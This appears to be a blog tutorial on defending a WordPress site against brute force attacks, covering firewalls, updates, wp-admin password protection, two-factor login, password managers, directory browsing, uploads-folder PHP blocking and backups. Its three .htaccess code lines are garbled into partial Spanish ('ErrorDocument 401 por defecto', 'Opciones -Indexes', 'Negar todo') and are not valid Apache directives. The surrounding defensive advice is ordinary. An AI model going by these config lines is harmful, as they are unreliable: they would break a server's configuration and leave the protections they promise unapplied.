Do you want to protect your WordPress site from brute force attacks? These attacks can slow down your website, make it inaccessible, and even crack your passwords to install malware on your website. In this article, we will show you how to protect your WordPress site from brute force attacks.
Brute Force Attack is a hacking method that uses trial and error techniques to penetrate a website, network, or computer system.
Hackers use automated software to send a large number of requests to the target system. With each request, this software tries to guess the information needed to gain access, such as passwords or PIN codes.
These tools can also be disguised using different IP addresses and locations, making it difficult for the target system to identify and block these suspicious activities.
A successful brute force attack can give hackers access to the admin area of your website. They can install backdoors, malware, steal user information, and delete everything on your site.
Even unsuccessful brute force attacks can wreak havoc by sending too many requests, slowing down WordPress hosting servers and even crashing them.
With that said, let's take a look at how to protect your WordPress site from brute force attacks.
Brute force attacks put a lot of load on your servers. Even the unsuccessful ones can slow down your website or completely crash the server. That's why it's important to block them before they reach your server.
To do that, you'll need a website firewall solution. A firewall filters bad traffic and blocks it from accessing your site.
There are two types of website firewalls that you can use.
Application-level firewalls - These firewall plugins examine traffic once it reaches your server but before loading most WordPress scripts. This method is not as efficient because a brute force attack can still affect your server load.
DNS-level website firewalls - These firewalls route your website traffic through their proxy servers in the cloud. This allows them to send only genuine traffic to their main web hosting server while increasing your WordPress speed and performance.
We recommend the use of Sucuri. It is the industry leader in website security and the best WordPress firewall on the market. Since it's a DNS-level firewall, it means that all of your website traffic goes through their proxy where bad traffic is filtered out.
We use Sucuri on our website, and you can read our full Sucuri review to learn more.
Some common brute force attacks actively target known vulnerabilities in older versions of WordPress, popular WordPress plugins, or themes.
WordPress core and most popular WordPress plugins are open source and vulnerabilities are often fixed very quickly with an update. However, if you don't install the updates, you will leave your website vulnerable to the above threats.
Simply go to Dashboard »Updates page in the WordPress admin area to check for available updates. This page will display all updates for your WordPress core, plugins, and themes.
For more details, check out our guide on how to properly update WordPress plugins.
Most brute force attacks on a WordPress site are trying to gain access to the WordPress admin area. You can add password protection to your WordPress admin directory at the server level. This would block unauthorized access to your WordPress admin area.
Simply login to your WordPress hosting control panel (cPanel) and click the 'Directory Privacy' icon in the Files section.
Note: We're using Bluehost in our screenshot, but similar setups are available from other major hosting companies like SiteGround, HostGator, etc.
Next, you need to locate the wp-admin folder and click on the folder name.
cPanel will now ask you to provide a name for the restricted folder, username and password. After entering this information, click the Save button to save your settings.
Your WordPress admin directory is now password protected. You will see a new login prompt when you visit the WordPress admin area.
If you encounter a 404 error or too many redirects message, you should add the following line to your WordPress .htaccess file.
ErrorDocument 401 por defecto
For more details, check out our article on how to password protect your WordPress admin directory.
Two-factor authentication adds an extra layer of security to your WordPress login screen. Basically, users will need their phones to generate a unique access code along with their login credentials to access the WordPress admin area.
Adding two-factor authentication will make it more difficult for hackers to gain access even if they are able to crack your WordPress password.
For detailed step-by-step instructions, check out our guide on how to add two-factor authentication in WordPress
Passwords are the keys to gain access to your WordPress site. You need to use unique strong passwords for all your accounts. A strong password is a combination of numbers, letters, and special characters.
It is important that you use strong passwords not only for your WordPress user accounts but also for FTP, the web hosting control panel, and your WordPress database.
Most of the beginners ask us how to remember all these unique passwords. Well, it is not necessary. There are great password manager apps available that will securely store your passwords and autofill them for you.
For more information, check out our beginner's guide on the best way to manage passwords for WordPress.
By default, when your web server doesn't find an index file (ie a file like index.php or index.html), it automatically displays an index page showing the contents of the directory.
During a brute force attack, hackers can use directory browsing to search for vulnerable files. To fix this issue, you need to add the following line to the bottom of your WordPress .htaccess file.
Opciones -Indexes
For more details, check out our article on how to disable directory searching in WordPress.
Hackers may want to install and run a PHP script in your WordPress folders. WordPress is primarily written in PHP, which means you can't disable it in all WordPress folders.
However, there are some folders that don't need any PHP script. For example, your WordPress uploads folder located at /wp-content/uploads.
You can safely disable PHP execution in the uploads folder, which is a common place hackers use to hide backdoor files.
First, you need to open a text editor like Notepad on your computer and paste the following code:
Negar todo
Now save this file as .htaccess and upload it to the /wp-content/uploads/ folder on your website using an FTP client.
Backups are the most important tool in your WordPress security arsenal. If all else fails, then backups will allow you to easily restore your website.
Most WordPress hosting companies offer limited backup options. However, these backups are not guaranteed and you are solely responsible for making your own backups.
There are several great WordPress backup plugins, which allow you to schedule automatic backups.
We recommend the use of UpdraftPlus. It's beginner-friendly and lets you quickly set up automatic backups and store them in remote locations like Google Drive, Dropbox, Amazon S3, and more.
For step-by-step instructions, check out our guide on how to backup and restore your WordPress site with UpdraftPlus
All the tips mentioned above will help you protect your WordPress site against brute force attacks. For a more comprehensive security setup, you should follow the instructions in our WordPress security guide for beginners.
We hope this article has helped you learn how to protect your WordPress site from brute force attacks. You may also want to see the signs that your WordPress has been hacked and how to fix a hacked WordPress site.
If you enjoyed this article, please subscribe to our WordPress YouTube Channel video tutorials. You can also find us on Twitter and Facebook.